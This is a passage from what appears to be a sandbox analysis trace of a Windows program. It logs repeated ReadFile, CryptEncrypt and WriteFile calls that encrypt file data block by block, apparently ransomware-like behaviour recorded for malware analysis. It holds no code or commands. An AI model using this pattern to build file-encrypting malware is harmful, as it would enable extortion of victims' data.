pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.153] GetLastError () returned 0x0 [0157.153] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.153] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.153] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.153] GetLastError () returned 0x0 [0157.153] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.153] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.153] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.153] GetLastError () returned 0x0 [0157.153] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.153] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.153] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.153] GetLastError () returned 0x0 [0157.153] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.153] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.153] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.153] GetLastError () returned 0x0 [0157.153] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.153] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.153] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.153] GetLastError () returned 0x0 [0157.153] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.154] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.154] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.154] GetLastError () returned 0x0 [0157.154] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.154] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.154] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.154] GetLastError () returned 0x0 [0157.154] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.154] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.154] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.154] GetLastError () returned 0x0 [0157.154] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.154] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.154] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.154] GetLastError () returned 0x0 [0157.154] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.154] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.154] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.154] GetLastError () returned 0x0 [0157.154] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.154] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.154] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.154] GetLastError () returned 0x0 [0157.154] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.154] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.155] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.155] GetLastError () returned 0x0 [0157.155] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.155] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.155] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.155] GetLastError () returned 0x0 [0157.155] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.155] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.155] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.155] GetLastError () returned 0x0 [0157.155] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.155] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.155] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.155] GetLastError () returned 0x0 [0157.155] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.155] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.155] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.156] GetLastError () returned 0x0 [0157.156] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.156] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.156] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.156] GetLastError () returned 0x0 [0157.156] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.156] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.156] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.156] GetLastError () returned 0x0 [0157.156] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.156] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.156] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.156] GetLastError () returned 0x0 [0157.156] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.156] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.156] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.156] GetLastError () returned 0x0 [0157.156] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.156] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.156] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.156] GetLastError () returned 0x0 [0157.156] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.156] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.156] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.156] GetLastError () returned 0x0 [0157.157] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.157] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.157] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.157] GetLastError () returned 0x0 [0157.157] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.157] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.157] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.157] GetLastError () returned 0x0 [0157.157] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.157] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.157] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.157] GetLastError () returned 0x0 [0157.157] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.157] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.157] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.157] GetLastError () returned 0x0 [0157.157] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.157] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.157] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.157] GetLastError () returned 0x0 [0157.157] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.157] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.157] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.157] GetLastError () returned 0x0 [0157.157] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.158] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.158] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.158] GetLastError () returned 0x0 [0157.158] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.158] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.158] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.158] GetLastError () returned 0x0 [0157.158] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.158] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.158] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.158] GetLastError () returned 0x0 [0157.158] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.158] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.158] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, 